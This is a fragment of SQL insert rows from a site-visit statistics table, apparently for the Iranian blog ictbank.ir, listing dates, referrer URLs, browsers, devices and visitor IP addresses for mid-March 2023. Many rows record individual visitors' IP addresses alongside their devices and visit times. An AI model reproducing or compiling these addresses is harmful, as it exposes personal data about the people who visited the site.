(30051,'2023-03-13','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','50.0','desktop','Unknown','','45.148.103.112','000',0,1,0),
(30052,'2023-03-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','108.167.146.236','000',0,1,0),
(30053,'2023-03-13','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','207.244.241.132','000',0,2,0),
(30054,'2023-03-13','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','103.216.223.206','000',0,3,0),
(30055,'2023-03-13','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(30056,'2023-03-13','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(30057,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,4,0),
(30058,'2023-03-14','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30059,'2023-03-14','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.78.6','000',0,1,0),
(30060,'2023-03-14','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.251.11.3','000',0,1,0),
(30061,'2023-03-14','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.28','000',0,1,0),
(30062,'2023-03-14','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.12','000',0,2,0),
(30063,'2023-03-14','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(30064,'2023-03-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.60','000',0,2,0),
(30065,'2023-03-14','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,8,0),
(30066,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,3,0),
(30067,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,3,0),
(30068,'2023-03-14','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(30069,'2023-03-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30070,'2023-03-14','http://www.google.com.hk','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.40.68','000',0,5,0),
(30071,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,2,0),
(30072,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,2,0),
(30073,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.85.52.174','000',0,1,0),
(30074,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.44','000',0,4,0),
(30075,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30076,'2023-03-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.62.229.95','000',0,3,0),
(30077,'2023-03-14','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','134.209.144.226','000',0,11,0),
(30078,'2023-03-14','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','35.170.33.107','000',0,1,0),
(30079,'2023-03-14','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(30080,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','91.107.131.82','000',0,1,0),
(30081,'2023-03-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(30082,'2023-03-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(30083,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(30084,'2023-03-14','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,1,0),
(30085,'2023-03-14','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.204.165.227','000',0,1,0),
(30086,'2023-03-14','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(30087,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.144.16','000',0,1,0),
(30088,'2023-03-14','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','206.189.35.158','000',0,2,0),
(30089,'2023-03-14','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.173.161.171','000',0,1,0),
(30090,'2023-03-14','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','44.200.111.217','000',0,10,0),
(30091,'2023-03-14','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.17','000',0,3,0),
(30092,'2023-03-14','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','207.174.215.236','000',0,1,0),
(30093,'2023-03-14','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(30094,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(30095,'2023-03-14','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(30096,'2023-03-14','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','142.93.176.125','000',0,1,0),
(30097,'2023-03-14','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30098,'2023-03-15','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,2,0),
(30099,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.232','000',0,1,0),
(30100,'2023-03-15','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','2.57.122.80','000',0,1,0),
(30101,'2023-03-15','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(30102,'2023-03-15','https://ictbank.ir/blog','Firefox','Windows','88.0','desktop','Unknown','','13.53.66.190','000',0,1,0),
(30103,'2023-03-15','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(30104,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(30105,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,1,0),
(30106,'2023-03-15','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','114.107.225.150','000',0,1,0),
(30107,'2023-03-15','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.165.223.112','000',0,4,0),
(30108,'2023-03-15','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.147.61','000',0,1,0),
(30109,'2023-03-15','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','84.239.40.230','000',0,3,0),
(30110,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','122.155.3.106','000',0,1,0),
(30111,'2023-03-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.54','000',0,1,0),
(30112,'2023-03-15','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(30113,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','216.226.131.116','000',0,1,0),
(30114,'2023-03-15','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30115,'2023-03-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.46','000',0,3,0),
(30116,'2023-03-15','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30117,'2023-03-15','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','85.208.214.68','000',0,1,0),
(30118,'2023-03-15','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,4,0),
(30119,'2023-03-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.24','000',0,1,0),
(30120,'2023-03-15','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','212.192.24.22','000',0,1,0),
(30121,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,3,0),
(30122,'2023-03-15','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,5,0),
(30123,'2023-03-15','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','194.26.192.189','000',0,22,0),
(30124,'2023-03-15','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','103.209.146.156','000',0,1,0),
(30125,'2023-03-15','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','92.222.70.66','000',0,4,0),
(30126,'2023-03-15','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','79.120.76.144','000',0,1,0),
(30127,'2023-03-15','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','192.99.57.46','000',0,2,0),
(30128,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','128.199.179.16','000',0,1,0),
(30129,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','64.226.90.175','000',0,7,0),
(30130,'2023-03-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.14.161.248','000',0,1,0),
(30131,'2023-03-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.177.212.11','000',0,1,0),
(30132,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','167.172.192.54','000',0,4,0),
(30133,'2023-03-16','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30134,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.21','000',0,5,0),
(30135,'2023-03-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.8','000',0,3,0),
(30136,'2023-03-16','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30137,'2023-03-16','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30138,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,3,0),
(30139,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,2,0),
(30140,'2023-03-16','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,1,0),
(30141,'2023-03-16','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,2,0),
(30142,'2023-03-16','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.43','000',0,3,0),
(30143,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,5,0),
(30144,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,3,0),
(30145,'2023-03-16','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','130.0.234.6','000',0,1,0),
(30146,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','188.161.82.44','000',0,1,0),
(30147,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.47','000',0,1,0),
(30148,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(30149,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30150,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','64.227.172.57','000',0,326,0),
(30151,'2023-03-16','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.160.36','000',0,26,0),
(30152,'2023-03-16','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.44','000',0,1,0),
(30153,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','58.251.94.154','000',0,1,0),
(30154,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,1,0),
(30155,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','5.135.152.155','000',0,2,0),
(30156,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','209.146.23.178','000',0,2,0),
(30157,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.245','000',0,1,0),
(30158,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.253','000',0,1,0),
(30159,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.241','000',0,1,0),
(30160,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','93.158.91.243','000',0,1,0),
(30161,'2023-03-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.168.226.176','000',0,1,0),
(30162,'2023-03-16','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,6,0),
(30163,'2023-03-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','8.210.102.36','000',0,1,0),
(30164,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,1,0),
(30165,'2023-03-16','https://ictbank.ir/sites/nikooacademy/wp-admin/','Chrome','OS X','111.0.0.0','desktop','Macintosh','','85.133.232.202','000',0,1,0),
(30166,'2023-03-16','https://ictbank.ir/sites/nikooacademy/','Chrome','OS X','111.0.0.0','desktop','Macintosh','','5.238.156.75','000',0,9,0),
(30167,'2023-03-16','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.237.140.18','000',0,1,0),
(30168,'2023-03-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.92.27.198','000',0,1,0),
(30169,'2023-03-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.209.0','000',0,1,0),
(30170,'2023-03-16','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,4,0),
(30171,'2023-03-16','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(30172,'2023-03-16','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(30173,'2023-03-17','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.236.65.23','000',0,2,0),
(30174,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(30175,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,5,0),
(30176,'2023-03-17','https://ictbank.ir/blog','Chrome','iOS','111.0.0.0','mobile:smart','iPhone','','20.243.154.81','000',0,2,0),
(30177,'2023-03-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(30178,'2023-03-17','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','100.24.125.94','000',0,1,0),
(30179,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','144.91.90.167','000',0,1,0),
(30180,'2023-03-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(30181,'2023-03-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.207.193.92','000',0,70,0),
(30182,'2023-03-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','209.145.58.62','000',0,1,0),
(30183,'2023-03-17','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30184,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,4,0),
(30185,'2023-03-17','https://neginghavami.ir','Chrome','OS X','38.0.0.0','desktop','Macintosh','','83.166.247.13','000',0,1,0),
(30186,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,3,0),
(30187,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,6,0),
(30188,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,5,0),
(30189,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.118.140','000',0,1,0),
(30190,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.193.252','000',0,2,0),
(30191,'2023-03-17','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','60.29.208.118','000',0,1,0),
(30192,'2023-03-17','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,2,0),
(30193,'2023-03-17','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','111.90.145.166','000',0,3,0),
(30194,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(30195,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.203.208','000',0,2,0),
(30196,'2023-03-17','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','92.0.0.0','desktop','Unknown','','185.119.81.109','000',0,4,0),
(30197,'2023-03-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(30198,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','130.255.166.26','000',0,1,0),
(30199,'2023-03-17','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','4.224.25.155','000',0,1,0),
(30200,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','130.255.166.97','000',0,1,0),
(30201,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','130.255.166.69','000',0,1,0),
(30202,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','130.255.166.120','000',0,1,0),
(30203,'2023-03-17','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.41','000',0,3,0),
(30204,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.42','000',0,3,0),
(30205,'2023-03-17','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(30206,'2023-03-17','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,2,0),
(30207,'2023-03-17','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(30208,'2023-03-17','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,8,0),
(30209,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,2,0),
(30210,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,6,0),
(30211,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.133.37','000',0,1,0),
(30212,'2023-03-17','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.225.218','000',0,1,0),
(30213,'2023-03-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.57.247.239','000',0,1,0),
(30214,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','23.91.96.133','000',0,1,0),
(30215,'2023-03-17','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.40','000',0,1,0),
(30216,'2023-03-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','40.114.109.56','000',0,21,0),
(30217,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','82.223.100.86','000',0,1,0),
(30218,'2023-03-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(30219,'2023-03-17','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.99.248','000',0,3,0),
(30220,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','37.139.53.179','000',0,1,0),
(30221,'2023-03-17','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','216.226.150.164','000',0,1,0),
(30222,'2023-03-17','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.54','000',0,13,0),
(30223,'2023-03-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,1,0),
(30224,'2023-03-18','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(30225,'2023-03-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','40.114.109.56','000',0,18,0),
(30226,'2023-03-18','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(30227,'2023-03-18','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(30228,'2023-03-18','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30229,'2023-03-18','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.54','000',0,45,0),
(30230,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30231,'2023-03-18','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,8,0),
(30232,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','143.198.189.106','000',0,5,0),
(30233,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','3.81.165.219','000',0,1,0),
(30234,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','112.20.233.3','000',0,25,0),
(30235,'2023-03-18','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','36.150.60.24','000',0,4,0),
(30236,'2023-03-18','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30237,'2023-03-18','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.199','000',0,1,0),
(30238,'2023-03-18','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.91','000',0,1,0),
(30239,'2023-03-18','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','104.238.137.193','000',0,2,0),
(30240,'2023-03-18','https://design-arena.ir/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','62.204.41.199','000',0,2,0),
(30241,'2023-03-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','74.235.174.225','000',0,1,0),
(30242,'2023-03-18','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(30243,'2023-03-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(30244,'2023-03-18','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.150.235','000',0,125,0),
(30245,'2023-03-18','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30246,'2023-03-18','https://ictbank.ir/blog','Chrome','Android','111.0.0.0','mobile:smart','Galaxy A20','','20.243.154.81','000',0,2,0),
(30247,'2023-03-18','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(30248,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','146.190.100.64','000',0,2,0),
(30249,'2023-03-18','https://ictbank.ir/blog/comments/feed/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.179','000',0,5,0),
(30250,'2023-03-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.124.216.20','000',0,1,0),
(30251,'2023-03-18','https://l.instagram.com/','Instagram','iOS','274.0.0.0.0','mobile:smart','Unknown','','152.44.130.7','000',0,1,0),
(30252,'2023-03-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.131.161','000',0,2,0),
(30253,'2023-03-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.7.133.62','000',0,1,0),
(30254,'2023-03-18','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','88.0.0.0','desktop','Unknown','','185.119.81.109','000',0,2,0),
(30255,'2023-03-18','https://ictbank.ir/blog','Edge','Windows','84.0.0.0','desktop','Unknown','','50.31.21.10','000',0,2,0),
(30256,'2023-03-18','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,2,0),
(30257,'2023-03-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(30258,'2023-03-19','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(30259,'2023-03-19','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,1,0),
(30260,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','5.188.62.174','000',0,17,0),
(30261,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','112.20.233.3','000',0,7,0),
(30262,'2023-03-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30263,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','212.55.79.59','000',0,4,0),
(30264,'2023-03-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30265,'2023-03-19','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,4,0),
(30266,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30267,'2023-03-19','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(30268,'2023-03-19','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.77','000',0,5,0),
